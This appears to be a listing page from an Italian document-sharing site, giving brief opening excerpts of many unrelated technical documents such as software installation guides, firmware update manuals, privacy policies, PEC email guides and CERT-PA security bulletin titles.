Queste note operative sono valide ESCLUSIVAMENTE dalla versione 2.90 di Metodo. Queste note operative sono valide ESCLUSIVAMENTE dalla versione 2.90 di Metodo. Per le versioni precedenti fare riferimento all'apposita guida presente all'interno della documentazione. - Metodo può essere

Dettagli

Livello applicazione. Fondamenti di Informatica

Livello applicazione. Fondamenti di Informatica Livello applicazione Fondamenti di Informatica Previously on Fondamenti di informatica Livello fisico Livello instradamento Network e Internetwork Protocollo IP Indirizzi IP Routing Client e server Server:

Dettagli

WEBMAIL ODCECTA.IT. Guida all uso

WEBMAIL ODCECTA.IT. Guida all uso Guida all uso Guida all accesso ed all utilizzo delle caselle di posta elettronica dell Ordine dei Dottori Commercialisti ed Esperti Contabili di Taranto Dati aggiornati al 29/12/ 1. Caratteristiche del

Dettagli

Esportazione dei dati dei prodotti Google (Gmail, Drive, ecc)

Esportazione dei dati dei prodotti Google (Gmail, Drive, ecc) Esportazione dei dati dei prodotti Google (Gmail, Drive, ecc) Sommario 1. Google Takeout (Scarica i tuoi dati)... 2 a. Procedura di Google Takeout... 2 b. Come leggere i file scaricati tramite Google Takeout

Dettagli

Installazione e configurazione DSFPA (Datasoftware Fattura Pubblica Amministrazione)

Installazione e configurazione DSFPA (Datasoftware Fattura Pubblica Amministrazione) Installazione e configurazione DSFPA (Datasoftware Fattura Pubblica Amministrazione) L installazione del software DSFPA avviene in linea generale in due momenti: 1) Installazione lato server, in cui viene

Dettagli

Privacy Policy di Questa Applicazione raccoglie alcuni Dati Personali dei propri Utenti.

Privacy Policy di   Questa Applicazione raccoglie alcuni Dati Personali dei propri Utenti. Privacy Policy di www.serramenticarollothiene.it Questa Applicazione raccoglie alcuni Dati Personali dei propri Utenti. Titolare del Trattamento dei Dati: Serramenti Carollo Via Vittorio Veneto, 25 36016

Dettagli

Cookie policy per

Cookie policy per policy per www.bernardinidivise.it Uso dei cookie Il "Sito" (bernardinidivise.it) utilizza i per rendere i propri servizi semplici e efficienti per l utenza che visiona le pagine di bernardinidivise.it.

Dettagli

Guida al sito di download dei prodotti ViaLibera e Lybera

Guida al sito di download dei prodotti ViaLibera e Lybera Guida al sito di download dei prodotti ViaLibera e Lybera Sommario Guida al sito di download dei prodotti ViaLibera e Lybera... 1 Descrizione generale... 2 Menù generale... 2 Stato dei prodotti... 2 Home...

Dettagli

Aggiornamento del firmware della fotocamera

Aggiornamento del firmware della fotocamera Aggiornamento del firmware della fotocamera Grazie per aver scelto un prodotto Nikon. Questo manuale descrive come eseguire l aggiornamento del fi r m w a re. Se non siete sicuri di poter effettuare l

Dettagli

ID: CERT-PA-B Data: 18/04/2019

ID: CERT-PA-B Data: 18/04/2019 Bollettino: Campagna di malspam Ursnif indirizzata verso PEC italiane ID: CERT-PA-B002-190418 Data: 18/04/2019 AVVERTENZE Il documento ha lo scopo di fornire alle Amministrazioni accreditate il quadro

Dettagli

Desktop telematico : la novità dal 1 dicembre 2016

Desktop telematico : la novità dal 1 dicembre 2016 Per conoscere MySolution, la nuova piattaforma per l aggiornamento professionale che comprende le aree Fisco&Società e Lavoro, richiedi la prova gratuita di un mese attraverso l apposito link MySolution

Dettagli

Documentazione e tutorial

Documentazione e tutorial P r o g e t to Sinapsi RunAs Documentazione e tutorial Ver.1 del 01/12/2016 P.Iva 02554100129 email: assistenza-sinapsirunas@ghiraldello.it Pagina 1 di 13 Sommario Progetto Sinapsi RunAs Documentazione

Dettagli

Aggiornamento remoto della chiave hardware. Sommario

Aggiornamento remoto della chiave hardware. Sommario AMV S.r.l. Via San Lorenzo, 106 34077 Ronchi dei Legionari (Gorizia) Italy Ph. +39 0481.779.903 r.a. Fax +39 0481.777.125 E-mail: segreteria@amv.it www.amv.it Cap. Soc. 10.920,00 i.v. P.Iva: IT00382470318

Dettagli

Scrigno Client Setup

Scrigno Client Setup Scrigno Client Setup Indice Introduzione e requisiti...pag.2 1...Installazione di SCRIGNO...Pag.3 1.1...SCRIGNO HOSTING Installation...Pag.8 1.1.1...Note Tecniche su Installazione SCRIGNO Hosting...Pag.12

Dettagli

COME VISUALIZZARE LE COORDINATE DEL PUNTO E SALVARE LA POSIZIONE

COME VISUALIZZARE LE COORDINATE DEL PUNTO E SALVARE LA POSIZIONE COME VISUALIZZARE LE COORDINATE DEL PUNTO E SALVARE LA POSIZIONE a) Visualizzazione delle coordinate Per poter visualizzare le coordinate del punto in cui ci si trova, è necessario raggiungere la schermata

Dettagli

Aggiornamenti del software Guida per l utente

Aggiornamenti del software Guida per l utente Aggiornamenti del software Guida per l utente Copyright 2009 Hewlett-Packard Development Company, L.P. Windows è un marchio registrato negli Stati Uniti di Microsoft Corporation. Le informazioni contenute

Dettagli

Progetto Gennaio 2017

Progetto Gennaio 2017 UNIVESITÁ DEGLI STUDI DI MILANO LAUREA TRIENNALE IN COMUNICAZIONE DIGITALE PROGETTO LABORATORIO DI RETI DI CALCOLATORI Progetto Gennaio 2017 Matteo Zignani 12 dicembre 2016 1 PRESENTAZIONE DEL PROBLEMA

Dettagli

PROCEDURA D INSTALLAZIONE DEL SOFTWARE DELLA CARTA TS-CNS. ACTALIS su Windows 32 bit e 65 bit

PROCEDURA D INSTALLAZIONE DEL SOFTWARE DELLA CARTA TS-CNS. ACTALIS su Windows 32 bit e 65 bit PROCEDURA D INSTALLAZIONE DEL SOFTWARE DELLA CARTA TS-CNS ACTALIS su Windows 32 bit e 65 bit INDICE Introduzione alla procedura d installazione del software della carta TS-CNS... 3 Installazione Software

Dettagli

Note di release per l utente Xerox EX Print Server, Powered by Fiery per Xerox Color 800/1000 Press, versione 1.3

Note di release per l utente Xerox EX Print Server, Powered by Fiery per Xerox Color 800/1000 Press, versione 1.3 Note di release per l utente Xerox EX Print Server, Powered by Fiery per Xerox Color 800/1000 Press, versione 1.3 Questo documento contiene informazioni importanti su questo release. Distribuire una copia

Dettagli

Internet 2B IPIA

Internet 2B IPIA Internet 2B IPIA 2017-2018 1 Cos è Internet Una rete globale di reti di computer Sistemi in grado di mettere in comunicazione tra loro un certo numero di computer, che in questo modo possono condividere

Dettagli

Fon.Coop Manuale GIFCOOP di rinnovo/ripristino utenze e password. del 09/04/2018

Fon.Coop Manuale GIFCOOP di rinnovo/ripristino utenze e password. del 09/04/2018 Fon.Coop Manuale GIFCOOP di rinnovo/ripristino utenze e password del 09/04/2018 Indice INTRODUZIONE... 3 1. RINNOVO E RECUPERO PASSWORD... 4 Pag. 2 a 6 Introduzione Il presente documento espone l operatività

Dettagli

PROGETTAZIONE E REALIZZAZIONE DELLO SPORTELLO UNICO DEI SERVIZI (SUS) E INFORMATIZZAZIONE DEI PROCEDIMENTI DA EROGARE ON LINE

PROGETTAZIONE E REALIZZAZIONE DELLO SPORTELLO UNICO DEI SERVIZI (SUS) E INFORMATIZZAZIONE DEI PROCEDIMENTI DA EROGARE ON LINE PROGETTAZIONE E REALIZZAZIONE DELLO SPORTELLO UNICO DEI SERVIZI (SUS) E INFORMATIZZAZIONE DEI PROCEDIMENTI DA EROGARE ON LINE PROGETTO COFINANZIATO DALL UNIONE EUROPEA FESR FONDO EUROPEO DI SVILUPPO REGIONALE

Dettagli

Guida per l esecuzione del trasferimento del programma DINAMIC su un nuovo computer

Guida per l esecuzione del trasferimento del programma DINAMIC su un nuovo computer Guida per l esecuzione del trasferimento del programma DINAMIC su un nuovo computer La procedura si applica quando è necessario trasferire su un nuovo computer, per una sostituzione programmata oppure

Dettagli

OGGETTO: Costi Attivazione Servizio PEC (Posta Elettonica Certificata)

OGGETTO: Costi Attivazione Servizio PEC (Posta Elettonica Certificata) epublic s.r.l. Sede Legale: Via del Tigli n.7-28066 Galliate NO) Sede Operativa: C.so XXIII Marzo n.21-28100 Novara e-mail: info@epublic.it - Http://www.epublic.it Http://www.piemonteweb.it Spett.le COMUNE

Dettagli

PROGETTAZIONE E REALIZZAZIONE DELLO SPORTELLO UNICO DEI SERVIZI (SUS) E INFORMATIZZAZIONE DEI PROCEDIMENTI DA EROGARE ON LINE

PROGETTAZIONE E REALIZZAZIONE DELLO SPORTELLO UNICO DEI SERVIZI (SUS) E INFORMATIZZAZIONE DEI PROCEDIMENTI DA EROGARE ON LINE PROGETTAZIONE E REALIZZAZIONE DELLO SPORTELLO UNICO DEI SERVIZI (SUS) E INFORMATIZZAZIONE DEI PROCEDIMENTI DA EROGARE ON LINE PROGETTO COFINANZIATO DALL UNIONE EUROPEA FESR FONDO EUROPEO DI SVILUPPO REGIONALE

Dettagli

Aggiornamenti del software Guida per l'utente

Aggiornamenti del software Guida per l'utente Aggiornamenti del software Guida per l'utente Copyright 2008 Hewlett-Packard Development Company, L.P. Windows è un marchio registrato negli Stati Uniti di Microsoft Corporation. Le informazioni contenute

Dettagli

Portale di gestione Version 7.5

Portale di gestione Version 7.5 Portale di gestione Version 7.5 MANUALE DELL AMMINISTRATORE Revisione: 29/08/2017 Sommario 1 Informazioni sul documento...3 2 Informazioni sul portale di gestione...3 2.1 Account e unità... 3 2.2 Browser

Dettagli

Bollettino: Statistiche vulnerabilità 2016

Bollettino: Statistiche vulnerabilità 2016 Bollettino: Statistiche vulnerabilità 2016 ID: Data: 30/12/2016 AVVERTENZE Il documento ha lo scopo di fornire alle Amministrazioni accreditate il quadro di riferimento degli scenari di minaccia rilevat

Dettagli

Installazione e configurazione del connettore SIGLA/FEP e Var Hub 1

Installazione e configurazione del connettore SIGLA/FEP e Var Hub 1 Installazione e configurazione del connettore SIGLA/FEP e Var Hub 1 Introduzione Il connettore SIGLA/FEP e Var Hub è una procedura automatizzata che ha il compito di elaborare i pacchetti, contenenti notifiche

Dettagli

Software EasyTool Professional

Software EasyTool Professional Il software EasyTool Professional consente di effettuare, attraverso il PC, tutte le operazioni di configurazione, programmazione e manutenzione del sistema By-me in alternativa alla centrale. L applicativo

Dettagli

MAIL ENCRYPTOR PLUG-IN - User guide-

MAIL ENCRYPTOR PLUG-IN - User guide- MAIL ENCRYPTOR PLUG-IN - User guide- Aggiornato alla versione 3.2.1.9 MAIL ENCRYPTOR PLUG-IN Sommario Installazione di Mail Encryptor plug-in... 3 Utilizzo di Mail Encryptor plug-in... 5 Cifratura delle

Dettagli

Symantec IT Management Suite 8.0 powered by Altiris technology

Symantec IT Management Suite 8.0 powered by Altiris technology Symantec IT Management Suite 8.0 powered by Altiris technology Installazione e disinstallazione del plug-in di distribuzione nei computer client Deployment Solution è installato su Symantec Management

Dettagli

Sono disponibili i seguenti aggiornamenti:

Sono disponibili i seguenti aggiornamenti: Tipo Comunicazione Informativa Numero 002/SAI Data 19/12/2018 A Aziende Diogene Area Diogene Gestione Commerciale. Settore Fatturazione elettronica Oggetto Aggiornamenti software Sono disponibili i seguenti

Dettagli

Allegato 5 Definizioni

Allegato 5 Definizioni Allegato 5 Definizioni Ai fini del Manuale di gestione documentale dell Ente di Gestione per i Parchi e la Biodiversità Delta del Po si intende per: AMMINISTRAZIONE, l ; TESTO UNICO, il D.P.R. 20.12.2000,

Dettagli

Manuale Utente AdR. Equitalia S.p.A. Infrastruttura PEC. Titolo Documento : Manuale Utente AdR. Servizio : Infrastruttura PEC

Manuale Utente AdR. Equitalia S.p.A. Infrastruttura PEC. Titolo Documento : Manuale Utente AdR. Servizio : Infrastruttura PEC Equitalia S.p.A. Manuale Utente AdR Infrastruttura PEC 1 Data: 26/10/2015 Sommario 1. Revisioni del documento... 3 2. Introduzione... 3 3. Destinatari del manuale... 3 4. Organizzazione del manuale...

Dettagli

Aggiornamento del firmware per le fotocamere selezionate con supporto dei dati posizione

Aggiornamento del firmware per le fotocamere selezionate con supporto dei dati posizione Aggiornamento del firmware per le fotocamere selezionate con supporto dei dati posizione Grazie per aver scelto un prodotto Nikon. Questa guida descrive come aggiornare il firmware per le seguenti fotocamere

Dettagli

Configurazione della postazione di lavoro per il corretto funzionamento della crittografia

Configurazione della postazione di lavoro per il corretto funzionamento della crittografia Configurazione della postazione di lavoro per il corretto funzionamento della crittografia Sommario Requisiti Minimi Crittografia Italgas... 2 Verifica dei Certificati... 2 Installazione... 2 Verifica

Dettagli

Manuale Plugin SyncDB

Manuale Plugin SyncDB Manuale Plugin SyncDB Ver. 1.0.4 del 19/04/2011 /* * @package for Joomla 1.5.22 * @author L.Migliorino, L.Donati * @module SyncDB * @copyright 2009 Copyright (C) Neonevis Srl www.neonevis.it * @license

Dettagli

Alyante Continuous Delivery

Alyante Continuous Delivery Alyante Continuous Delivery Indice ACD 1 Alyante Continuous Delivery 3 1.1 Introduzione e architettura... 4 1.2 Prerequisiti... 5 1.2.1 Sistema... 5 1.2.2 Utenti... 6 1.3 Primo avvio/configurazione ed

Dettagli

Software Servizi Web UOGA

Software Servizi Web UOGA Manuale Operativo Utente Software Servizi Web UOGA S.p.A. Informatica e Servizi Interbancari Sammarinesi Strada Caiese, 3 47891 Dogana Tel. 0549 979611 Fax 0549 979699 e-mail: info@isis.sm Identificatore

Dettagli

BOOLE SERVER AGENT. - Installation guide- Aggiornato alla versione Boole Server

BOOLE SERVER AGENT. - Installation guide- Aggiornato alla versione Boole Server BOOLE SERVER AGENT - Installation guide- Aggiornato alla versione Boole Server 3.2.1.9 BOOLE SERVER AGENT INSTALLATION Sommario I prerequisiti di Sistema per l installazione di Boole Server Agent... 3

Dettagli

A) SCARICAMENTO DA DYNET E INSTALLAZIONE DELL AGGIORNAMENTO

A) SCARICAMENTO DA DYNET E INSTALLAZIONE DELL AGGIORNAMENTO Versioni... VB Rel. agg.to... 010416 Rel. docum.to...is010416_inst Data docum.to... 01/04/2016 A) SCARICAMENTO DA DYNET E INSTALLAZIONE DELL AGGIORNAMENTO L aggiornamento prevede l installazione del moduli

Dettagli

PEC Business. Guida Rapida alla gestione dello spazio mailbox

PEC Business. Guida Rapida alla gestione dello spazio mailbox Codice Documento: CERTPECE.TT.DUMU1700.00 Emesso: 15/05/2017 PEC Business Guida Rapida alla gestione dello spazio mailbox GUIDA UTENTE Telecom Italia Trust Technologies S.r.l. - Documento pubblico Tutti

Dettagli

Samsung Universal Print Driver Guida dell utente

Samsung Universal Print Driver Guida dell utente Samsung Universal Print Driver Guida dell utente immagina le possibilità Copyright 2009 Samsung Electronics Co., Ltd. Tutti i diritti riservati. Questa guida viene fornita solo a scopo informativo. Tutte

Dettagli

Horizone Server IN00B02WEB. Horizone PDK

Horizone Server IN00B02WEB. Horizone PDK Horizone Server IN00B02WEB Horizone PDK Prodotto: -- Descrizione: Horizone PDK - Manuale Utente Data: 10/07/2017 Eelectron Spa IN00B02WEBFI00080102_PDK_MANUAL.DOCX 1/12 Qualsiasi informazione all interno

Dettagli

TRACCIA In Windows, la pressione contemporanea dei tasti CTRL+ALT+CANC:

TRACCIA In Windows, la pressione contemporanea dei tasti CTRL+ALT+CANC: TRACCIA 3 1. RAM, ovvero RANDOM ACCESS MEMORY significa: A. Record di ampliamento memoria B. Memoria di sola lettura C. Memoria ad accesso casuale 2. Quali file hanno come estensione.exe? A -I file di

Dettagli

PROCEDURA D INSTALLAZIONE DEL SOFTWARE DELLA CARTA TS-CNS. OBERTHUR su Windows 32 bit e 65 bit

PROCEDURA D INSTALLAZIONE DEL SOFTWARE DELLA CARTA TS-CNS. OBERTHUR su Windows 32 bit e 65 bit PROCEDURA D INSTALLAZIONE DEL SOFTWARE DELLA CARTA TS-CNS OBERTHUR su Windows 32 bit e 65 bit INDICE Introduzione alla procedura d installazione del software della carta TS-CNS... 3 Installazione Software

Dettagli

Sono disponibili i seguenti aggiornamenti:

Sono disponibili i seguenti aggiornamenti: Tipo Comunicazione Informativa Numero 002/SAI Data 19/12/2018 A Aziende Diogene Area Diogene Gestione Commerciale. Settore Fatturazione elettronica Oggetto Aggiornamenti software Sono disponibili i seguenti

Dettagli

PROCEDURA D INSTALLAZIONE DEL SOFTWARE DELLA CARTA TS-CNS. ATOS su Linux 32 bit e 64 bit

PROCEDURA D INSTALLAZIONE DEL SOFTWARE DELLA CARTA TS-CNS. ATOS su Linux 32 bit e 64 bit PROCEDURA D INSTALLAZIONE DEL SOFTWARE DELLA CARTA TS-CNS ATOS su Linux 32 bit e 64 bit INDICE Introduzione alla procedura d installazione del software della carta TS-CNS... 3 Installazione per ATOS su

Dettagli

Download ed Installazione del Software di Firma Digitale

Download ed Installazione del Software di Firma Digitale Download ed Installazione del Software di Firma Digitale 1. Download del Software Il software necessario è disponibile sul sito http://www.ittelecom.it/default.aspx?idpage=632 Le componenti da installare

Dettagli

MUDE Piemonte. Nuove modalità salvataggio, firma istanza e gestione allegati

MUDE Piemonte. Nuove modalità salvataggio, firma istanza e gestione allegati MUDE Piemonte Nuove modalità salvataggio, firma istanza e gestione allegati STATO DELLE VARIAZIONI Versione Paragrafo o Pagina Descrizione della variazione V01 Tutto il documento Versione iniziale del

Dettagli

COOKIE POLICY Cosa sono i cookie?

COOKIE POLICY Cosa sono i cookie? COOKIE POLICY Gli applicativi software utilizzati possono contenere la tecnologia cookie. I cookie hanno principalmente la funzione di agevolare la navigazione da parte dell utente. I cookie potranno fornire

Dettagli

Documento di Policy e configurazione del sistema di virtualizzazione per le postazioni universitarie presso gli Spedali Civili di Brescia.

Documento di Policy e configurazione del sistema di virtualizzazione per le postazioni universitarie presso gli Spedali Civili di Brescia. Documento di Policy e configurazione del sistema di virtualizzazione per le postazioni universitarie presso gli Spedali Civili di Brescia. 20160126_DCSS_VDI_ospedale.docx 1/8 Sommario Premessa... 3 Destinatari

Dettagli